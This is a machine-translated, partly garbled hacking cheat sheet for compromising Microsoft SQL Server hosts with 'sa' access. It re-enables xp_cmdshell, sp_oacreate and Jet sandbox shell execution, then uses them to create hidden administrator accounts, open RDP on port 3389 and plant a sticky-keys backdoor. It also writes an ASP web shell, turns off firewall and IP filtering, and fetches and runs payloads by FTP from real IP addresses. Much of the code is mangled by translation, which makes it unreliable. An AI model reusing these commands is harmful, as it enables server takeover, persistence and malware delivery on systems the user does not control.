1433 Remonto užsakymai
grynasis vartotojas SQLDebugger sąrašas /add
net localgroup administrators SQLDebugger /add
Klaidos pranešimas: Nepavyko rasti saugomos procedūros "master.. xp_cmdshell'。
Remonto būdas: labai bendras, iš tikrųjų kitus 126 127 galima taisyti kartu,
Išskyrus xplog70.dll visa kita galima išspręsti naudojant šią komandą
xp_cmdshell naujus atkūrimo metodus
1 veiksmas: ištrinkite:
lašinimo procedūra sp_addextendedproc
lašinimo procedūra sp_oacreate
exec sp_dropextendedproc "xp_cmdshell"
Serveris: Msg 3701, 11 lygis, 5 būsena, 1 eilutė
Neįmanoma pašalinti proceso "sp_addextendedproc", nes jo nėra sistemos kataloge.
Serveris: Msg 3701, 11 lygis, 5 būsena, sp_dropextendedproc procedūra, 18 eilutė
Neįmanoma pašalinti proceso "xp_cmdshell", nes jo nėra sistemos kataloge.
2 žingsnis Atkūrimas:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
Tiesioginis susigrąžinimas, nepriklausomai nuo to, ar sp_addextendedproc egzistuoja, ar ne
xplog70.dll pataisymai:
Klaidos pranešimas: DLL xplog70.dll arba vieno iš DLL nurodytų DLL prijungti nepavyko. Priežastis: 126 (nurodyto modulio rasti nepavyko.) )。
Ištaisykite XPLOG70.DLL (pirmiausia patikrinkite atsarginės kopijos katalogą \x86\bin su failu, tada pakeiskite šį katalogą)
1 žingsnis
exec sp_dropextendedproc "xp_cmdshell"
2 žingsnis
dbcc addextendedproc ("xp_cmdshell","c:\sql2ksp4\x86\binn\xplog70.dll")
Nepavyko rasti saugomos procedūros 'master.. xp_cmdshell'。
1 žingsnis:
Sukurti procedūrą sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (savininkas.) Iškviečiamos funkcijos pavadinimas
*/
@dllname varchar(255)/* DLL pavadinimas, kuriame yra funkcija */
kaip
Nustatykite implicit_transactions išjungti
jei @@trancount > 0
Pradėti
raiserror(15002,-1,-1,'sp_addextendedproc')
grąžinimas (1)
pabaiga
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
EITI
2 žingsnis:
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
SQL serveris užblokavo prieigą prie komponento xp_cmdshell proceso sys.xp_cmdshell, nes šis komponentas buvo išjungtas kaip šio serverio saugos konfigūracijos dalis. Sistemos administratoriai gali įgalinti "xp_cmdshell" naudodami sp_configure. Daugiau informacijos apie xp_cmdshell įgalinimą rasite Periferinių programų konfigūratorius SQL serverio internetinių knygų serijoje.
; EXEC sp_configure "rodyti išplėstines parinktis", 1 --
; PERKONFIGŪRUOTI SU NEPAISYMU --
; EXEC sp_configure "xp_cmdshell", 1 --
; PERKONFIGŪRUOTI SU NEPAISYMU --
; EXEC sp_configure "rodyti išplėstines parinktis", 0 --
Pašalinkite pavojingą SQL saugyklą:
LAŠINIMO PROCEDŪRA sp_makewebtask
exec meistras .. sp_dropextendedproc xp_cmdshell
exec meistras .. sp_dropextendedproc xp_dirtree
exec meistras .. sp_dropextendedproc xp_fileexist
exec meistras .. sp_dropextendedproc xp_terminate_process
exec meistras .. sp_dropextendedproc sp_oamethod
exec meistras .. sp_dropextendedproc sp_oacreate
exec meistras .. sp_dropextendedproc xp_regaddmultistring
exec meistras .. sp_dropextendedproc xp_regdeletekey
exec meistras .. sp_dropextendedproc xp_regdeletevalue
exec meistras .. sp_dropextendedproc xp_regenumkeys
exec meistras .. sp_dropextendedproc xp_regenumvalues
exec meistras .. sp_dropextendedproc sp_add_job
exec meistras .. sp_dropextendedproc sp_addtask
exec meistras .. sp_dropextendedproc xp_regread
exec meistras .. sp_dropextendedproc xp_regwrite
exec meistras .. sp_dropextendedproc xp_readwebtask
exec meistras .. sp_dropextendedproc xp_makewebtask
exec meistras .. sp_dropextendedproc xp_regremovemultistring
exec meistras .. sp_dropextendedproc sp_OACreate
LAŠINIMO PROCEDŪRA sp_addextendedproc
Išplėstinių saugomų procedūrų atkūrimas
Pirmiausia atkurkite sp_addextendedproc, teiginys yra toks:
Pirmas:
Sukurti procedūrą sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (savininkas.) funkcijos pavadinimas, kurį reikia iškviesti */ @dllname varchar(255)/* DLL, kuriame yra funkcija */ kaip
Nustatykite implicit_transactions išjungti
jei @@trancount > 0
Pradėti
raiserror(15002,-1,-1,'sp_addextendedproc')
grąžinimas (1)
pabaiga
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
EITI
Antra:
Naudokite "Master"
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,"xpstar.dll"
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
Naikinti sakinį, kuris pratęsia saugomą procedūrą xp_cmdshell:
exec sp_dropextendedproc "xp_cmdshell"
Atkurkite cmdshell sql sakinį
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Atidarykite cmdshell SQL sakinį
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Nustatykite, ar yra saugyklos išplėtimas
Pasirinkite count(*) iš master.dbo.sysobjects, kur xtype='x' ir name='xp_cmdshell'
Grąžinamas rezultatas yra 1 ir viskas gerai
Atkurti xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll'; Pasirinkite count(*) iš master.dbo.sysobjects, kur xtype='x' ir name='xp_cmdshell'
Grąžinamas rezultatas yra 1 ir viskas gerai
Kitu atveju įkelkite xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
Užblokuokite cmdshell sql sakinį
sp_dropextendedproc "xp_cmdshell
Vienas. SA slaptažodžio keitimas:
Prisijungę prie SQL visapusiško naudojimo įrankio, vykdykite komandą:
exec sp_password NULL, 'naujas slaptažodis', 'sa'
(Patarimas: naudokite atsargiai!)
Du. Tiesiog pataisykite silpną slaptažodį.
1 būdas: prijungę užklausą skirstytuvui:
jei yra (pasirinkite * iš
dbo.sysobjects, kur id = object_id(N'[dbo].[ xp_cmdshell]') ir
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo]. [xp_cmdshell]"
EITI
Tada paspauskite klavišą F5, kad vykdytumėte komandą
2 būdas: užklausa prijungus skirstytuvą
Pirmasis žingsnis yra vykdyti: naudoti meistrą
2 veiksmas: sp_dropextendedproc "xp_cmdshell"
Tada paspauskite klavišą F5, kad vykdytumėte komandą
DLL xpsql70.dll arba vieno iš DLL nurodytų DLL prijungti negalima. 126 priežastis (nurodyto modulio rasti nepavyko. )
Atkūrimo būdas: užklausus skirstytuvo jungtį,
1 žingsnis: sp_dropextendedproc "xp_cmdshell"
2 žingsnis: sp_addextendedproc "xp_cmdshell", "xpsql70.dll"
Funkcijos xp_cmdshell nepavyko rasti bibliotekos xpweb70.dll. Priežastis: 127 (Nurodytos programos rasti nepavyko.) )
Atkūrimo būdas: užklausus skirstytuvo jungtį,
1 žingsnis Vykdymas: exec sp_dropextendedproc "xp_cmdshell"
2 žingsnis: exec sp_addextendedproc "xp_cmdshell", "xpweb70.dll"
Tada paspauskite klavišą F5, kad vykdytumėte komandą
Jei nė vieno iš aukščiau nurodytų būdų negalima atkurti, pabandykite pridėti paskyrą tiesiogiai šiais būdais:
Užklausę skirstytuvo jungtį,
2000servser sistema:
declare @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user Web hacker /add'
declare @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators Web /add'
XP arba 2003Server sistema: 126 klaida! Užsakyti
deklaruoti @shell int exec sp_oacreate 'wscrip remove t.shell', @shell išvesties exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user Web$ hacker /add'
declare @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators Web$ /add'
C:\>DIR C:\
SQL serveris užblokavo prieigą prie komponento xp_cmdshell proceso sys.xp_cmdshell, nes šis komponentas buvo išjungtas kaip šio serverio saugos konfigūracijos dalis. Sistemos administratoriai gali įgalinti "xp_cmdshell" naudodami sp_configure. Daugiau informacijos apie xp_cmdshell įgalinimą rasite Periferinių programų konfigūratorius SQL serverio internetinių knygų serijoje.
Analizatoriaus vykdomi teiginiai:
EXEC sp_configure "rodyti išplėstines parinktis", 1; PERKONFIGŪRUOTI; EXEC sp_configure "xp_cmdshell", 1; PERKONFIGŪRUOTI;
Kartais, vykdant aukščiau pateiktus teiginius su užklausos atjungimo ryšiu, saugomos procedūros negalima rasti sp_addextendedproc
Sprendimo būdas:
Sukurti procedūrą sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (savininkas.) Iškviestinos funkcijos pavadinimas */
@dllname varchar(255)/* DLL pavadinimas, kuriame yra funkcija */
kaip
Nustatykite implicit_transactions išjungti
jei @@trancount > 0
Pradėti
raiserror(15002,-1,-1,'sp_addextendedproc')
grąžinimas (1)
pabaiga
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
EITI
Šis kodas įklijuojamas į užklausos skirstytuvą ir vykdomas
Naršyklė:
c:\windows\explorer.exe
Peržiūrėti turinį
exec master.dbo.xp_subdirs 'c:\'
Sąrašo diskai
exec meistras .. xp_fixeddrives
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行) 直接加帐号!
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Pasirinkite * iš OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")');
Pasirinkite * iš OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
echo "Windows" registro rengyklės 5.00 versija >3389.reg
aidas. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
aidas [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
aidas [HKEY_USERS\. DEFAULT\Keyboard Layout\Toggle] >>3389.reg
aidas "Spartusis klavišas"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
regedit /s 3389.reg
Atidaryti 3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0; --
3389 leidimas:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;
Patikrinkite prievadą 3389
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Įprastos CMD galinės durys
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'
win2K eina tiesiai į PS Mar
exec meistras .. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Pasirinkite * iš openrowset('microsoft.jet.oledb.4.0','; database=C:\winNT\System32\IAS\ias.mdb','select shell("cmd.exe /c @echo atidaryti 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo gauti 0.exe>>net.txt& @echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
win03-XP tiesiai ant PS žirgų
exec meistras .. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Pasirinkite * iš openrowset('microsoft.jet.oledb.4.0','; database=C:\Windows\System32\IAS\ias.mdb','Pasirinkite Shell("cmd.exe /c @echo atidarykite 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo gauti 0.exe>>net.txt& @echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
5. Perkelkite užpakalinių durų komandą
deklaruoti @o int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
deklaruoti @o int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
kopijuoti c:\windows\explorer.exe c:\windows\system32\sethc.exe
kopijuoti c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
deklaruoti @o int
exec sp_oacreate 'wscrip remove t.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX yra komanda, kurią norite vykdyti
Parašykite registre nurodytame rakte nurodytą reikšmę, naudodami metodą (parašykite bbb rakte HKEY_LOCAL_MACHINE\SOFTWARE\aaa\aaaValue):
EXEC meistras.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='PROGRAMINĖ ĮRANGA\aaa',
@value_name='aaaReikšmė',
@type='REG_SZ',
@value='bbb'
@echo atidaryti 121.22.56.5>c:\bin.txt&@echo list>>c:\bin.txt&@echo list>>c:\bin.txt&@echo gauti gzn.exe>>c:\bin.txt&@echo bye>>c:\bin.txt&@ftp -s:c:\bin.txt&del c:\bin.txt&gzn.exe& gzn.exe&gzn.exe
Pirmiausia nukopijuokite ftp.exe į wmpub katalogą
@echo kompaktinis diskas c:\wmpub\>c:\wmpub\in.bat&@echo ftp -s:c:\wmpub\xiuxiu.txt>>c:\wmpub\in.bat
Atidaryti 3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators IUSR_SERVER /add
SQL rašo sakinį
exec master.dbo.xp_subdirs 'd:\web\cdlxkj';
exec sp_makewebtask 'd:\web\cdlxkj\XX.asp','select''<%execute(request("SB"))%>'' '
SA smėlio dėžės režimo reklamos -----
----------------------
exec meistras .. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
-------------------------------------------------------
Pasirinkite * iš OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user sql$ 123 /add")');
-------------------------------------------------------
Pasirinkite * iš OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators sql$ /add")');
3389 PAMAINA
Vartojamas sakinys:
Invazija
EXEC meistras.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE",
@value_name='Derintuvas',
@type='REG_SZ',
@value='C:\WINDOWS\explorer.exe'
Atsigavimas
EXEC meistras.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE",
@value_name='Derintuvas',
@type='REG_SZ',
@value=''
Vaizdo užgrobimas
EXEC meistras.. xp_regwrite --- tai registro redagavimas!
@rootkey='HKEY_LOCAL_MACHINE', ---Štai tokia padėtis!
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE", -----Tai taip pat pozicija!
@value_name='Derintuvas', --- tai yra lentelės pavadinimas!
@type='REG_SZ', --- čia yra rašymo prasmė!
@value='C:\WINDOWS\explorer.exe' ---- čia yra parašytas turinys!
Visas procesas yra naudoti meistrą: xp_regwrite šis komponentas bus padarytas,
1.sql komandą, kad užklaustumėte, ar registro lipnus raktas buvo užgrobtas
exec meistras .. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
2.sql komanda užgrobia registro lipnaus klavišo funkciją ir pakeičia ją užduočių tvarkykle (žinoma, galite ją pakeisti kitomis norimomis komandomis)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Derintuvas','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'
3.sql komanda, skirta pašalinti registro lipnaus rakto užgrobimo funkciją, apsaugo jūsų serverį nuo kitų išnaudojimo
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
SQL rašymo failai
deklaruoti @o int, @f int, @t int, @ret int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("Wscrip remove t.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork. Kompiuterio vardas'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob. Create("vartotojas","testas")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
Scenarijai be NET eskalavimo
struser=wscrip pašalinti t.arguments(0)
strpass=wscrip pašalinti t.arguments(1)
set lp=createObject("Wscrip pašalinti t.NETWORK")
oz="WinNT://"&lp. Kompiuterio pavadinimas
Nustatyti ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Nustatyti od=ob.create("vartotojas",struser)
od. SetPassword strpass
od. Nustatyti informaciją
Set of=GetObject(oz&"/" & struser & ",user")
oe. Pridėti (iš. ADsPath)
Kiekvienam administratoriui oe. Nariai
jei struser=admin. Pavadinimas tada
Wscrip pašalintas t.echo struser & "Nustatyta sėkmingai!"
wscrip pašalinti t.quit
pabaiga, jei
Kitas
Wscrip remove t.echo struser & "Vartotojo įsteigimas nepavyko!"
Išsaugokite aukščiau kaip vartotoją. VBS failas
Tada vykdykite: cscrip, kad pašalintumėte user.vbs vartotojo vardo slaptažodį
Naudodami JET smėlio dėžės režimą galite išspręsti problemas, kurias sukelia saugomos procedūros, pvz., XP_cmdshell ir susijusios dinaminių nuorodų bibliotekos. Saugumo sumetimais sistema pagal numatytuosius nustatymus neįjungia smėlio dėžės režimo, todėl reikia xp_regwrite įjungti smėlio dėžės režimą:
Vykdomasis master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0
\Varikliai','Smėlio dėžės režimas','REG_DWORD',1
Tada vykdykite smėlio dėžės komandą, kad prie sistemos pridėtumėte vartotoją, pavadintą testu su slaptažodžiu 1234:
Pasirinkite * iš openrowset('microsoft.jet.oledb.4.0','; Duomenų bazė=C:\Windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')
Pasirinkite * iš openrowset('microsoft.jet.oledb.4.0','; Duomenų bazė=C:\Windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup
administratoriai testuoja /prideda")')
Skirtingos operacinės sistemos turi skirtingus kelius ir jas reikia keisti atsižvelgiant į situaciją:
NT/2K: c:\winnt\system32\
XP/2003: c:\windows\system32\
Be to, "Microsoft SQL Server 2005" kai kurios saugomos procedūros yra uždarytos pagal numatytuosius nustatymus ir reikalauja komandų, kad būtų atidarytos:
Įjunkite XP_cmdshell:
EXEC sp_configure "rodyti išplėstines parinktis", 1; PERKONFIGŪRUOTI; EXEC sp_configure
"xp_cmdshell", 1; PERKONFIGŪRUOTI;
Atidarykite "OPENROWSET":
exec sp_configure 'rodyti išplėstines parinktis', 1; PERKONFIGŪRUOTI; exec sp_configure
"Ad hoc paskirstytosios užklausos",1; PERKONFIGŪRUOTI;
Įjunkite "sp_oacreate".
exec sp_configure 'rodyti išplėstines parinktis', 1; PERKONFIGŪRUOTI; exec sp_configure
"Ole automatizavimo procedūros",1; PERKONFIGŪRUOTI;
Štai keletas situacijų, kai vykdymo komanda pagal sa yra neteisinga:
1. DLL xpsql70.dll arba DLL, kurį nurodo DLL, įkelti negalima. 126 priežastis (nurodyto modulio rasti nepavyko. )
Ši situacija yra gana dažna, o remontas yra paprastas ir paprastas, tačiau yra sąlygų. Jei šiuo atveju galite išvardyti katalogą (naudojant sqltools v2.0 yra katalogo funkcija) Sveikiname su šia 80% situacija gali būti ištaisyta, jei galite išvardyti katalogą, tada tiesiog raskite xplog70.dll kelią ir vykdykite šią komandą.
1 žingsnis
exec sp_dropextendedproc "xp_cmdshell" (ši komanda skirta ištrinti pradinį cmdshell, nes jis jau suklydo)
2 žingsnis
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
; EXEC sp_configure "rodyti išplėstines parinktis", 0 –
Žinoma, tai yra sql komanda, vykdoma su užklausų analizatoriumi. Antrame žingsnyje c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll yra xplog70.dll kelias, šis kelias yra gana dažnas, jei c diske jo nėra, galite rasti kitų disko raidžių.
2. Nepavyko rasti funkcijos xp_cmdshell bibliotekos xpweb70.dll. Priežastis: 127 (Nurodytos programos rasti nepavyko.) )
Tiesą sakant, tai yra tas pats, kas aukščiau pateiktas 126, tai yra, cmdshell yra neteisingas, jei tik rasite atsarginę kopiją xplog70.dll vadovaukitės aukščiau nurodytu metodu, kad ją ištaisytumėte.
3. Nepavyko rasti išsaugotos procedūros "pagrindinė". xpcmdshell"
Šiuo atveju internete matau, kad metodas yra:
1 veiksmas: ištrinkite:
lašinimo procedūra sp_addextendedproc
lašinimo procedūra sp_oacreate
exec sp_dropextendedproc "xp_cmdshell"
2 žingsnis Atkūrimas:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
Tiesą sakant, tai vis dar tas pats, kaip aukščiau, iš tikrųjų, jei esate atsargūs, pirmiau 126 127 tik nepavyks rasti saugomos procedūros "meistras:. xpcmdshell", nes pirmas žingsnis yra ištrinti išsaugotą cmdshell procedūrą. Taigi tokiu atveju tiesiog atlikite antrą aukščiau pateiktą veiksmą.
4. Klaidos pranešimas: SQL serveris užblokavo prieigą prie komponento "xp_cmdshell" proceso "sys.xp_cmdshell", nes šis komponentas buvo išjungtas kaip šio serverio saugos konfigūracijos dalis. Sistemos administratoriai gali įgalinti "xp_cmdshell" naudodami sp_configure. Daugiau informacijos apie xp_cmdshell įgalinimą rasite Periferinių programų konfigūratorius SQL serverio internetinių knygų serijoje.
Ši situacija yra paprasčiausia, nes jums nereikia apie nieką galvoti, tiesiog vykdykite šią komandą
; EXEC sp_configure "rodyti išplėstines parinktis", 1 --
; PERKONFIGŪRUOTI SU NEPAISYMU --
; EXEC sp_configure "xp_cmdshell", 1 --
; PERKONFIGŪRUOTI SU NEPAISYMU --
; EXEC sp_configure "rodyti išplėstines parinktis", 0 –
Atlikę aukščiau pateiktą pataisymą, galite vykdyti komandą cmd ir pradėsite didinti savo galią. Paprastai pirmiausia patikrinu ip, kad pamatyčiau, ar tai intranetas, o tada REG užklausą HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber", kad patikrinčiau terminalo prievadą, o tada netstat –an, kad pamatyčiau, ar terminalas atidarytas, ir tada tinklo vartotojo slaptažodį / pridėti vartotoją ir tada net vietinės grupės administratoriai vartotojas /add Jei viskas bus gerai, tai nutrauks serverį. Tačiau šiame procese yra daug problemų.
1. Grynosios galios skatinimas yra sėkmingas, bet negali prisijungti prie terminalo Yra šios situacijos
(1) Serveris yra intranete.
(2) TCP/IP tikrinimas.
Pirmiausia paleiskite šią cmd komandą:
cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, eksportuokite pirmąją TCP/IP filtravimo registro dalį
cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip, eksportuokite antrąją TCP/IP filtravimo registro dalį
cmd /c regedit -e c:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip", eksportuojantis trečią vietą registre apie TCP/IP filtravimą
Tada grįžkite į c diską 1.reg, 2.reg, 3.reg, atsisiųskite 1.reg, 2.reg 3.reg atgal į standųjį diską, kad galėtumėte redaguoti, raskite lauką EnableSecurityFilters, kad pamatytumėte, ar rakto reikšmė po dword yra 00000000, jei ji 00000001, tai reiškia, kad administratorius atliko tcp/ip filtravimą, mums tereikia pakeisti 1 į 0, 2. reg ir 3.reg atlikti tuos pačius pakeitimus.
(3) Sukurkite intelektinės nuosavybės saugumo politiką.
Paleiskite komandą cmd: cmd /c net stop policyagent, kad sustabdytumėte IPSEC paslaugų paslaugą. Vėl prijunkite terminalą.
(4) Administratoriaus nustatyta terminalo prisijungimo teise gali naudotis tik nurodytas vartotojas.
(5) Ugniasienė. Paleiskite komandą cmd: net stop alg /ynet stop sharedaccess
2. Atsiranda NET eskalacija ir atsisakoma prieigos
Galite išbandyti net1 vartotojo vartotojo slaptažodį /add Jei net1 taip pat neleidžia prieigos, galite nukopijuoti shfit užpakalines duris ir pabandyti vykdyti cmd komandą: kopijuoti c:\windows\explorer.exe c:\windows\system32\sethc.exe
kopijuoti c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
Jei būsite paraginti, nukopijuokite 1 failą, kuris pasirodo sėkmingas. Prisijunkite prie terminalo ir paspauskite 5 shift, kad pamatytumėte, kas pasirodo. Žaiskite su "Kaka Explorer", dabar tiesiog pridėkite vartotoją ranka.
3. Tinklo eskalavimas įvyksta su 5 prieigos atsisakymo klaida (paryškinimas)
Tokiu atveju jums nereikia bandyti net1, galite pabandyti kopijuoti perkelti atgalines duris, jei kopija ragina nukopijuoti 0 failą, tai įrodo, kad tai nesėkminga. Tada galite pabandyti jį įkelti, jei galite įkelti, galite tiesiogiai nusiųsti prieš kurį laiką pasirodžiusį netinklinį energijos eskalavimo įrankį ir pridėti vartotoją. Tačiau daugumos šių atvejų negalima įkelti, todėl turite apie tai pagalvoti. Kadangi cmd galima vykdyti, failą galima atsisiųsti per cmd pagal ftp, tačiau ftp prielaida yra mokėti rašyti tekstą arba paketinį apdorojimą. Tada galite parašyti tekstą arba paketą naudodami SQL sakinį.
deklaruoti @o int, @f int, @t int, @ret int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'C:\1.bat', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP'
